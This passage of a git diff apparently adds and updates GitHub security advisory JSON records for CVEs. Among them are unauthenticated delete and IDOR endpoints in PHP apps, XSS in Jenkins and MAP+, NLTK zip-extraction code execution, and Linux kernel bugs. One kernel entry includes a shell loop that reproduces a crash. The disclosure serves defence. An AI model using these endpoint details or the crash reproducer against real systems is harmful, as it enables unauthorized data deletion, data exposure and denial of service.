], + "details": "Missing authentication in multiple administrative action scripts under /admin/ in ProjectWorlds Online Time Table Generator 1.0 allows remote attackers to perform unauthorized administrative operations (e.g.,adding records, deleting records) via direct HTTP requests to affected endpoints without a valid session.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-70146" + }, + { + "type": "WEB", + "url": "https://projectworlds.com/online-time-table-generator-php-mysql" + }, + { + "type": "WEB", + "url": "https://youngkevinn.github.io/posts/CVE-2025-70146-OTTTG-Unauth-Deletion" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T17:21:35Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-5q5x-wqxc-vv25/GHSA-5q5x-wqxc-vv25.json b/advisories/unreviewed/2026/02/GHSA-5q5x-wqxc-vv25/GHSA-5q5x-wqxc-vv25.json new file mode 100644 index 0000000000000..5ae2cdead35c8 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-5q5x-wqxc-vv25/GHSA-5q5x-wqxc-vv25.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-5q5x-wqxc-vv25", + "modified": "2026-02-18T18:30:40Z", + "published": "2026-02-18T18:30:40Z", + "aliases": [ + "CVE-2025-70150" + ], + "details": "CodeAstro Membership Management System 1.0 contains a missing authentication vulnerability in delete_members.php that allows unauthenticated attackers to delete arbitrary member records via the id parameter.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-70150" + }, + { + "type": "WEB", + "url": "https://www.phpscriptsonline.com/product/membership-management-software" + }, + { + "type": "WEB", + "url": "https://youngkevinn.github.io/posts/CVE-2025-70150-Membership-Unauth-Delete" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T18:24:20Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-5qf3-3gp9-pjx6/GHSA-5qf3-3gp9-pjx6.json b/advisories/unreviewed/2026/02/GHSA-5qf3-3gp9-pjx6/GHSA-5qf3-3gp9-pjx6.json new file mode 100644 index 0000000000000..9c236c4a9f1b4 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-5qf3-3gp9-pjx6/GHSA-5qf3-3gp9-pjx6.json @@ -0,0 +1,41 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-5qf3-3gp9-pjx6", + "modified": "2026-02-18T18:30:40Z", + "published": "2026-02-18T18:30:40Z", + "aliases": [ + "CVE-2026-23222" + ], + "details": "In the Linux kernel, the following vulnerability has been resolved:\n\ncrypto: omap - Allocate OMAP_CRYPTO_FORCE_COPY scatterlists correctly\n\nThe existing allocation of scatterlists in omap_crypto_copy_sg_lists()\nwas allocating an array of scatterlist pointers, not scatterlist objects,\nresulting in a 4x too small allocation.\n\nUse sizeof(*new_sg) to get the correct object size.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-23222" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/2ed27b5a1174351148c3adbfc0cd86d54072ba2e" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/6edf8df4bd29f7bfd245b67b2c31d905f1cfc14b" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/c184341920ed78b6466360ed7b45b8922586c38f" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/d1836c628cb72734eb5f7dfd4c996a9c18bba3ad" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T16:22:31Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-5qq8-6gv4-wmcc/GHSA-5qq8-6gv4-wmcc.json b/advisories/unreviewed/2026/02/GHSA-5qq8-6gv4-wmcc/GHSA-5qq8-6gv4-wmcc.json new file mode 100644 index 0000000000000..ccdda4562e27d --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-5qq8-6gv4-wmcc/GHSA-5qq8-6gv4-wmcc.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-5qq8-6gv4-wmcc", + "modified": "2026-02-18T18:30:39Z", + "published": "2026-02-18T18:30:39Z", + "aliases": [ + "CVE-2025-15579" + ], + "details": "Deserialization of Untrusted Data vulnerability in OpenText™ Directory Services allows Object Injection. The vulnerability could lead to remote code execution, denial of service, or\nprivilege escalation.\n\nThis issue affects Directory Services: from 10.5 through 26.1.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:P/AU:Y/R:U/V:C/RE:M/U:Red" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-15579" + }, + { + "type": "WEB", + "url": "https://support.opentext.com/csm?id=ot_kb_unauthenticated&sysparm_article=KB0859600&sys_kb_id=f82c01214707b6144549b6bd416d43b7&spa=1" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-502" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T16:22:28Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-636r-hfj8-v9m7/GHSA-636r-hfj8-v9m7.json b/advisories/unreviewed/2026/02/GHSA-636r-hfj8-v9m7/GHSA-636r-hfj8-v9m7.json index 85329480ef21b..73cf5cf59f57a 100644 --- a/advisories/unreviewed/2026/02/GHSA-636r-hfj8-v9m7/GHSA-636r-hfj8-v9m7.json +++ b/advisories/unreviewed/2026/02/GHSA-636r-hfj8-v9m7/GHSA-636r-hfj8-v9m7.json @@ -1,13 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-636r-hfj8-v9m7", - "modified": "2026-02-05T18:30:32Z", + "modified": "2026-02-18T18:30:23Z", "published": "2026-02-05T18:30:32Z", "aliases": [ "CVE-2026-0715" ], "details": "Moxa Arm-based industrial computers running Moxa Industrial Linux Secure use a device-unique bootloader password provided on the device. An attacker with physical access to the device could use this information to access the bootloader menu via a serial interface.  Access to the bootloader menu does not allow full system takeover or privilege escalation. The bootloader enforces digital signature verification and only permits flashing of Moxa-signed images. As a result, an attacker cannot install malicious firmware or execute arbitrary code. The primary impact is limited to a potential temporary denial-of-service condition if a valid image is reflashed. Remote exploitation is not possible.", "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:P/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" diff --git a/advisories/unreviewed/2026/02/GHSA-64jv-v62f-2xrg/GHSA-64jv-v62f-2xrg.json b/advisories/unreviewed/2026/02/GHSA-64jv-v62f-2xrg/GHSA-64jv-v62f-2xrg.json new file mode 100644 index 0000000000000..641fe2b08c0ff --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-64jv-v62f-2xrg/GHSA-64jv-v62f-2xrg.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-64jv-v62f-2xrg", + "modified": "2026-02-18T18:30:40Z", + "published": "2026-02-18T18:30:40Z", + "aliases": [ + "CVE-2026-20141" + ], + "details": "In Splunk Enterprise versions below 10.0.2, 10.0.3, 9.4.8, and 9.3.9, a low-privileged user who does not hold the \"admin\" Splunk role could access the Splunk Monitoring Console App endpoints due to an improper access control. This could lead to a sensitive information disclosure.

The Monitoring Console app is a bundled app that comes with Splunk Enterprise. It is not available for download on SplunkBase, and is not installed on Splunk Cloud Platform instances. This vulnerability does not affect [Cloud Monitoring Console](https://help.splunk.com/en/splunk-cloud-platform/administer/admin-manual/10.2.2510/monitor-your-splunk-cloud-platform-deployment/introduction-to-the-cloud-monitoring-console).", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-20141" + }, + { + "type": "WEB", + "url": "https://advisory.splunk.com/advisories/SVD-2026-0206" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-200" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T18:24:26Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-6rjp-j8mc-4f57/GHSA-6rjp-j8mc-4f57.json b/advisories/unreviewed/2026/02/GHSA-6rjp-j8mc-4f57/GHSA-6rjp-j8mc-4f57.json new file mode 100644 index 0000000000000..2e3227d1f630e --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-6rjp-j8mc-4f57/GHSA-6rjp-j8mc-4f57.json @@ -0,0 +1,60 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-6rjp-j8mc-4f57", + "modified": "2026-02-18T18:30:40Z", + "published": "2026-02-18T18:30:40Z", + "aliases": [ + "CVE-2026-2657" + ], + "details": "A vulnerability has been found in wren-lang wren up to 0.4.0. This impacts the function printError of the file src/vm/wren_compiler.c of the component Error Message Handler. Such manipulation leads to stack-based buffer overflow. An attack has to be approached locally. The exploit has been disclosed to the public and may be used. The project was informed of the problem early through an issue report but has not responded yet.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2657" + }, + { + "type": "WEB", + "url": "https://github.com/wren-lang/wren/issues/1221" + }, + { + "type": "WEB", + "url": "https://github.com/oneafter/0122/blob/main/i1221/repro" + }, + { + "type": "WEB", + "url": "https://github.com/wren-lang/wren" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.346455" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.346455" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.752791" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-119" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T17:21:40Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-6xrx-3vj8-2rjc/GHSA-6xrx-3vj8-2rjc.json b/advisories/unreviewed/2026/02/GHSA-6xrx-3vj8-2rjc/GHSA-6xrx-3vj8-2rjc.json new file mode 100644 index 0000000000000..d3013aa26201c --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-6xrx-3vj8-2rjc/GHSA-6xrx-3vj8-2rjc.json @@ -0,0 +1,33 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-6xrx-3vj8-2rjc", + "modified": "2026-02-18T18:30:39Z", + "published": "2026-02-18T18:30:39Z", + "aliases": [ + "CVE-2025-71230" + ], + "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nhfs: ensure sb->s_fs_info is always cleaned up\n\nWhen hfs was converted to the new mount api a bug was introduced by\nchanging the allocation pattern of sb->s_fs_info. If setup_bdev_super()\nfails after a new superblock has been allocated by sget_fc(), but before\nhfs_fill_super() takes ownership of the filesystem-specific s_fs_info\ndata it was leaked.\n\nFix this by freeing sb->s_fs_info in hfs_kill_super().", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-71230" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/399219831514126bc9541e8eadefe02c6fbd9166" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/46c1d56ad321fb024761abd9af61a0cb616cf2f6" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T16:22:29Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-74jq-6q38-p5wf/GHSA-74jq-6q38-p5wf.json b/advisories/unreviewed/2026/02/GHSA-74jq-6q38-p5wf/GHSA-74jq-6q38-p5wf.json index 7b0a56750956f..fe2beee4b60ab 100644 --- a/advisories/unreviewed/2026/02/GHSA-74jq-6q38-p5wf/GHSA-74jq-6q38-p5wf.json +++ b/advisories/unreviewed/2026/02/GHSA-74jq-6q38-p5wf/GHSA-74jq-6q38-p5wf.json @@ -26,6 +26,7 @@ ], "database_specific": { "cwe_ids": [ + "CWE-284", "CWE-288" ], "severity": "HIGH", diff --git a/advisories/unreviewed/2026/02/GHSA-74rw-28vp-8wh9/GHSA-74rw-28vp-8wh9.json b/advisories/unreviewed/2026/02/GHSA-74rw-28vp-8wh9/GHSA-74rw-28vp-8wh9.json index 327b526f1d626..ad4b1df5bf041 100644 --- a/advisories/unreviewed/2026/02/GHSA-74rw-28vp-8wh9/GHSA-74rw-28vp-8wh9.json +++ b/advisories/unreviewed/2026/02/GHSA-74rw-28vp-8wh9/GHSA-74rw-28vp-8wh9.json @@ -1,13 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-74rw-28vp-8wh9", - "modified": "2026-02-06T09:30:28Z", + "modified": "2026-02-18T18:30:23Z", "published": "2026-02-06T09:30:28Z", "aliases": [ "CVE-2026-0521" ], "details": "A reflected cross-site scripting (XSS) vulnerability in the PDF export functionality of the TYDAC AG MAP+ solution allows unauthenticated attackers to craft a malicious URL, that if visited by a victim, will execute arbitrary JavaScript in the victim's context. Such a URL could be delivered through various means, for instance, by sending a link or by tricking victims to visit a page crafted by the attacker.\n\n\n\nThis issue was verified in MAP+: 3.4.0.", "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" + }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:L/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" diff --git a/advisories/unreviewed/2026/02/GHSA-78xc-39m5-v2c6/GHSA-78xc-39m5-v2c6.json b/advisories/unreviewed/2026/02/GHSA-78xc-39m5-v2c6/GHSA-78xc-39m5-v2c6.json new file mode 100644 index 0000000000000..24d12465b54be --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-78xc-39m5-v2c6/GHSA-78xc-39m5-v2c6.json @@ -0,0 +1,37 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-78xc-39m5-v2c6", + "modified": "2026-02-18T18:30:40Z", + "published": "2026-02-18T18:30:40Z", + "aliases": [ + "CVE-2025-71233" + ], + "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nPCI: endpoint: Avoid creating sub-groups asynchronously\n\nThe asynchronous creation of sub-groups by a delayed work could lead to a\nNULL pointer dereference when the driver directory is removed before the\nwork completes.\n\nThe crash can be easily reproduced with the following commands:\n\n # cd /sys/kernel/config/pci_ep/functions/pci_epf_test\n # for i in {1..20}; do mkdir test && rmdir test; done\n\n BUG: kernel NULL pointer dereference, address: 0000000000000088\n ...\n Call Trace:\n configfs_register_group+0x3d/0x190\n pci_epf_cfs_work+0x41/0x110\n process_one_work+0x18f/0x350\n worker_thread+0x25a/0x3a0\n\nFix this issue by using configfs_add_default_group() API which does not\nhave the deadlock problem as configfs_register_group() and does not require\nthe delayed work handler.\n\n[mani: slightly reworded the description and added stable list]", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-71233" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/24a253c3aa6d9a2cde46158ce9782e023bfbf32d" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/73cee890adafa2c219bb865356e08e7f82423fe5" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/d9af3cf58bb4c8d6dea4166011c780756b1138b5" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T16:22:30Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-7fjm-558r-4j8r/GHSA-7fjm-558r-4j8r.json b/advisories/unreviewed/2026/02/GHSA-7fjm-558r-4j8r/GHSA-7fjm-558r-4j8r.json new file mode 100644 index 0000000000000..bdefd92383ede --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-7fjm-558r-4j8r/GHSA-7fjm-558r-4j8r.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-7fjm-558r-4j8r", + "modified": "2026-02-18T18:30:40Z", + "published": "2026-02-18T18:30:40Z", + "aliases": [ + "CVE-2025-70148" + ], + "details": "Missing authentication and authorization in print_membership_card.php in CodeAstro Membership Management System 1.0 allows unauthenticated attackers to access membership card data of arbitrary users via direct requests with a manipulated id parameter, resulting in insecure direct object reference (IDOR).", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-70148" + }, + { + "type": "WEB", + "url": "https://www.phpscriptsonline.com/product/membership-management-software" + }, + { + "type": "WEB", + "url": "https://youngkevinn.github.io/posts/CVE-2025-70148-Membership-IDOR" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T18:24:19Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-7p94-766c-hgjp/GHSA-7p94-766c-hgjp.json b/advisories/unreviewed/2026/02/GHSA-7p94-766c-hgjp/GHSA-7p94-766c-hgjp.json new file mode 100644 index 0000000000000..a7ca0379d3cc8 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-7p94-766c-hgjp/GHSA-7p94-766c-hgjp.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-7p94-766c-hgjp", + "modified": "2026-02-18T18:30:40Z", + "published": "2026-02-18T18:30:40Z", + "aliases": [ + "CVE-2025-14009" + ], + "details": "A critical vulnerability exists in the NLTK downloader component of nltk/nltk, affecting all versions. The _unzip_iter function in nltk/downloader.py uses zipfile.extractall() without performing path validation or security checks. This allows attackers to craft malicious zip packages that, when downloaded and extracted by NLTK, can execute arbitrary code. The vulnerability arises because NLTK assumes all downloaded packages are trusted and extracts them without validation. If a malicious package contains Python files, such as __init__.py, these files are executed automatically upon import, leading to remote code execution. This issue can result in full system compromise, including file system access, network access, and potential persistence mechanisms.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-14009" + }, + { + "type": "WEB", + "url": "https://huntr.com/bounties/49ecbc02-054e-4470-b2e0-b267936cc4e4" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-94" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T18:24:19Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-85h6-5m3v-gx37/GHSA-85h6-5m3v-gx37.json b/advisories/unreviewed/2026/02/GHSA-85h6-5m3v-gx37/GHSA-85h6-5m3v-gx37.json index 977856997d094..20e8e93f6cfb1 100644 --- a/advisories/unreviewed/2026/02/GHSA-85h6-5m3v-gx37/GHSA-85h6-5m3v-gx37.json +++ b/advisories/unreviewed/2026/02/GHSA-85h6-5m3v-gx37/GHSA-85h6-5m3v-gx37.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-85h6-5m3v-gx37", - "modified": "2026-02-18T15:31:27Z", + "modified": "2026-02-18T18:30:38Z", "published": "2026-02-18T15:31:27Z", "aliases": [ "CVE-2026-27099" ], "details": "Jenkins 2.483 through 2.550 (both inclusive), LTS 2.492.1 through 2.541.1 (both inclusive) does not escape the user-provided description of the \"Mark temporarily offline\" offline cause, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers with Agent/Configure or Agent/Disconnect permission.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H" + } + ], "affected": [], "references": [ { @@ -20,8 +25,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-79" + ], + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-18T15:18:43Z" diff --git a/advisories/unreviewed/2026/02/GHSA-876r-52fj-4pxf/GHSA-876r-52fj-4pxf.json b/advisories/unreviewed/2026/02/GHSA-876r-52fj-4pxf/GHSA-876r-52fj-4pxf.json new file mode 100644 index 0000000000000..2de5576a67e7f --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-876r-52fj-4pxf/GHSA-876r-52fj-4pxf.json @@ -0,0 +1,41 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-876r-52fj-4pxf", + "modified": "2026-02-18T18:30:40Z", + "published": "2026-02-18T18:30:40Z", + "aliases": [ + "CVE-2025-71235" + ], + "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nscsi: qla2xxx: Delay module unload while fabric scan in progress\n\nSystem crash seen during load/unload test in a loop.\n\n[105954.384919] RBP: ffff914589838dc0 R08: 0000000000000000 R09: 0000000000000086\n[105954.384920] R10: 000000000000000f R11: ffffa31240904be5 R12: ffff914605f868e0\n[105954.384921] R13: ffff914605f86910 R14: 0000000000008010 R15: 00000000ddb7c000\n[105954.384923] FS: 0000000000000000(0000) GS:ffff9163fec40000(0000) knlGS:0000000000000000\n[105954.384925] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n[105954.384926] CR2: 000055d31ce1d6a0 CR3: 0000000119f5e001 CR4: 0000000000770ee0\n[105954.384928] PKRU: 55555554\n[105954.384929] Call Trace:\n[105954.384931] \n[105954.384934] qla24xx_sp_unmap+0x1f3/0x2a0 [qla2xxx]\n[105954.384962] ? qla_async_scan_sp_done+0x114/0x1f0 [qla2xxx]\n[105954.384980] ? qla24xx_els_ct_entry+0x4de/0x760 [qla2xxx]\n[105954.384999] ? __wake_up_common+0x80/0x190\n[105954.385004] ? qla24xx_process_response_queue+0xc2/0xaa0 [qla2xxx]\n[105954.385023] ? qla24xx_msix_rsp_q+0x44/0xb0 [qla2xxx]\n[105954.385040] ? __handle_irq_event_percpu+0x3d/0x190\n[105954.385044] ? handle_irq_event+0x58/0xb0\n[105954.385046] ? handle_edge_irq+0x93/0x240\n[105954.385050] ? __common_interrupt+0x41/0xa0\n[105954.385055] ? common_interrupt+0x3e/0xa0\n[105954.385060] ? asm_common_interrupt+0x22/0x40\n\nThe root cause of this was that there was a free (dma_free_attrs) in the\ninterrupt context. There was a device discovery/fabric scan in\nprogress. A module unload was issued which set the UNLOADING flag. As\npart of the discovery, after receiving an interrupt a work queue was\nscheduled (which involved a work to be queued). Since the UNLOADING\nflag is set, the work item was not allocated and the mapped memory had\nto be freed. The free occurred in interrupt context leading to system\ncrash. Delay the driver unload until the fabric scan is complete to\navoid the crash.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-71235" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/528b2f1027edfb52af0171f0f4b227fb356dde05" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/7062eb0c488f35730334daad9495d9265c574853" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/c068ebbaf52820d6bdefb9b405a1e426663c635a" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/d70f71d4c92bcb8b6a21ac62d4ea3e87721f4f32" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T16:22:30Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-8j5g-3q2r-xfjh/GHSA-8j5g-3q2r-xfjh.json b/advisories/unreviewed/2026/02/GHSA-8j5g-3q2r-xfjh/GHSA-8j5g-3q2r-xfjh.json new file mode 100644 index 0000000000000..5ff8a05c13e27 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-8j5g-3q2r-xfjh/GHSA-8j5g-3q2r-xfjh.json @@ -0,0 +1,37 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-8j5g-3q2r-xfjh", + "modified": "2026-02-18T18:30:40Z", + "published": "2026-02-18T18:30:40Z", + "aliases": [ + "CVE-2026-23224" + ], + "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nerofs: fix UAF issue for file-backed mounts w/ directio option\n\n[ 9.269940][ T3222] Call trace:\n[ 9.269948][ T3222] ext4_file_read_iter+0xac/0x108\n[ 9.269979][ T3222] vfs_iocb_iter_read+0xac/0x198\n[ 9.269993][ T3222] erofs_fileio_rq_submit+0x12c/0x180\n[ 9.270008][ T3222] erofs_fileio_submit_bio+0x14/0x24\n[ 9.270030][ T3222] z_erofs_runqueue+0x834/0x8ac\n[ 9.270054][ T3222] z_erofs_read_folio+0x120/0x220\n[ 9.270083][ T3222] filemap_read_folio+0x60/0x120\n[ 9.270102][ T3222] filemap_fault+0xcac/0x1060\n[ 9.270119][ T3222] do_pte_missing+0x2d8/0x1554\n[ 9.270131][ T3222] handle_mm_fault+0x5ec/0x70c\n[ 9.270142][ T3222] do_page_fault+0x178/0x88c\n[ 9.270167][ T3222] do_translation_fault+0x38/0x54\n[ 9.270183][ T3222] do_mem_abort+0x54/0xac\n[ 9.270208][ T3222] el0_da+0x44/0x7c\n[ 9.270227][ T3222] el0t_64_sync_handler+0x5c/0xf4\n[ 9.270253][ T3222] el0t_64_sync+0x1bc/0x1c0\n\nEROFS may encounter above panic when enabling file-backed mount w/\ndirectio mount option, the root cause is it may suffer UAF in below\nrace condition:\n\n- z_erofs_read_folio wq s_dio_done_wq\n - z_erofs_runqueue\n - erofs_fileio_submit_bio\n - erofs_fileio_rq_submit\n - vfs_iocb_iter_read\n - ext4_file_read_iter\n - ext4_dio_read_iter\n - iomap_dio_rw\n : bio was submitted and return -EIOCBQUEUED\n - dio_aio_complete_work\n - dio_complete\n - dio->iocb->ki_complete (erofs_fileio_ki_complete())\n - kfree(rq)\n : it frees iocb, iocb.ki_filp can be UAF in file_accessed().\n - file_accessed\n : access NULL file point\n\nIntroduce a reference count in struct erofs_fileio_rq, and initialize it\nas two, both erofs_fileio_ki_complete() and erofs_fileio_rq_submit() will\ndecrease reference count, the last one decreasing the reference count\nto zero will free rq.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-23224" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/ae385826840a3c8e09bf38cac90adcd690716f57" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/b2ee5e4d5446babd23ff7beb4e636be0fb3ea5aa" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/d741534302f71c511eb0bb670b92eaa7df4a0aec" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T16:22:32Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-8rh3-rvv2-3mr4/GHSA-8rh3-rvv2-3mr4.json b/advisories/unreviewed/2026/02/GHSA-8rh3-rvv2-3mr4/GHSA-8rh3-rvv2-3mr4.json index 77e61c9efb6e4..31bb4f1e329d7 100644 --- a/advisories/unreviewed/2026/02/GHSA-8rh3-rvv2-3mr4/GHSA-8rh3-rvv2-3mr4.json +++ b/advisories/unreviewed/2026/02/GHSA-8rh3-rvv2-3mr4/GHSA-8rh3-rvv2-3mr4.json @@ -26,7 +26,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-288" + "CWE-288", + "CWE-400" ], 